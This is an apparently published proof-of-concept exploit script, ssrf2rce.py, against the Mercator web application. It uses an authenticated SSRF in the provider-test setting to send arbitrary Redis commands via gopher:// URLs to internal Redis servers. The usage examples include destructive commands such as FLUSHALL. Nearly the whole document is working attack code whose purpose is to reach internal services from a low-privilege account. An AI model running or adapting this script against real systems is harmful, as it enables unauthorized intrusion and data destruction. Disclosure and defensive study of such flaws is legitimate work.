5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / ssrf2rce.py PY
#!/usr/bin/env python3
"""
Mercator SSRF -> gopher:// -> Redis helper.

Sends ONE Redis command (or a small pipeline of them) to an internal Redis
instance through the SSRF in `ConfigurationController::testProvider`.

Why this works
--------------
1. The vulnerable controller calls `curl_init($provider . '/api/dbInfo')`.
   We append `#` to our URL so curl drops the `/api/dbInfo` suffix as a
   URL fragment.
2. libcurl in the deployed PHP container speaks `gopher://`. Gopher URLs
   of the form `gopher://host:port/_<bytes>` send `<bytes>` raw on the
   wire after dropping the single type character `_`.
3. We URL-encode RESP-encoded Redis commands as `<bytes>`. Redis happily
   parses them and executes.

Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role, so a regular low-privilege account is sufficient.

Usage
-----
    # Single command
    ./bin/python3 ssrf2redis.py \\
        --base http://127.0.0.1:8000 \\
        --user lowuser --password 'Lowuser123!' \\
        --redis 127.0.0.1:6379 \\
        --cmd SET ssrf_proof 'pwned-by-low-priv'

    # Pipeline (commands separated by a literal ';' token)
    ./bin/python3 ssrf2redis.py ... --pipeline \\
        FLUSHALL ';' \\
        SET marker hello ';' \\
        CONFIG GET dir

The script reports the flash message returned by Mercator (an oracle), not
the Redis reply — gopher is fire-and-forget here; verify the effect with a
follow-up command or out-of-band check.
"""
import argparse
import re
import sys
import urllib.parse
import warnings

# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")

import requests
import urllib3
urllib3.disable_warnings()

LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
FLASH_RE = re.compile(r'(Could not connect to provider[^<"\']*|Last NVD update:[^<"\']*)')


# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────

def log(message):
    """Status banner — emitted on stderr so stdout stays pure result data."""
    print(message, file=sys.stderr)


def die(message):
    log(f"[!] {message}")
    sys.exit(1)


def login(session, base, user, password):
    """Authenticate, print the login section, and return the CSRF token."""
    r = session.get(f"{base}/login", timeout=10)
    m = LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found on /login")
    r = session.post(
        f"{base}/login",
        data={"_token": m.group(1), "login": user, "password": password},
        timeout=10, allow_redirects=True,
    )
    if r.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")
    m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found after login")
    csrf = m.group(1)
    log("[+] login")
    log(f"    user       : {user}")
    for c in session.cookies:
        log(f"    cookie     : {c.name}={c.value}")
    log(f"    csrf token : {csrf}")
    return csrf


# ── SSRF -> gopher -> Redis ─────────────────────────────────────────────────

def require_configure(session, base):
    """Confirm the account holds the `configure` permission."""
    r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
    if r.status_code == 403:
        die("account lacks the 'configure' permission")


def resp_encode(command):
    """Encode a single Redis command (list of str/bytes) as a RESP array."""
    parts = [f"*{len(command)}\r\n".encode()]
    for a in command:
        if isinstance(a, str):
            a = a.encode()
        parts.append(f"${len(a)}\r\n".encode() + a + b"\r\n")
    return b"".join(parts)


def build_pipeline(items):
    """Split a flat list at the literal ';' separator -> list of commands."""
    cmds, current = [], []
    for tok in items:
        if tok == ";":
            if current:
                cmds.append(current)
                current = []
        else:
            current.append(tok)
    if current:
        cmds.append(current)
    return cmds


def fire(session, base, csrf, gopher_url):
    """Send the gopher payload and return Mercator's flash message."""
    session.post(
        f"{base}/admin/config/parameters",
        data={
            "_token": csrf,
            "_method": "PUT",
            "active_tab": "cve",
            "action": "test_provider",
            "provider": gopher_url,
        },
        allow_redirects=False, timeout=20,
    )
    page = session.get(f"{base}/admin/config/parameters?tab=cve").text
    m = FLASH_RE.search(page)
    return m.group(1) if m else "(no flash captured)"


def main():
    ap = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__)
    ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--redis", required=True, help="host:port of the target Redis")
    ap.add_argument("--cmd", nargs="+", help="single Redis command, e.g. SET k v")
    ap.add_argument("--pipeline", nargs="+",
                    help="multiple commands separated by a literal ';' token, "
                         "e.g. FLUSHALL ';' SET k v ';' SAVE")
    args = ap.parse_args()

    if args.cmd and args.pipeline:
        die("use either --cmd or --pipeline, not both")
    if not args.cmd and not args.pipeline:
        die("provide --cmd or --pipeline")

    commands = [args.cmd] if args.cmd else build_pipeline(args.pipeline)
    raw = b"".join(resp_encode(c) for c in commands)
    gopher_url = f"gopher://{args.redis}/_{urllib.parse.quote(raw, safe='')}#"

    session = requests.Session()
    session.verify = False
    csrf = login(session, args.base, args.user, args.password)
    require_configure(session, args.base)

    log(f"[*] sending {len(commands)} Redis command(s) to {args.redis} via gopher SSRF")
    for c in commands:
        log(f"    - {' '.join(c)}")
    flash = fire(session, args.base, csrf, gopher_url)
    log(f"[+] flash: {flash}")
    log("[*] flash is Mercator's view of the gopher response, not Redis — "
        "verify side effects out-of-band")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        die("interrupted")
    except requests.RequestException as e:
        die(f"could not reach Mercator: {e}")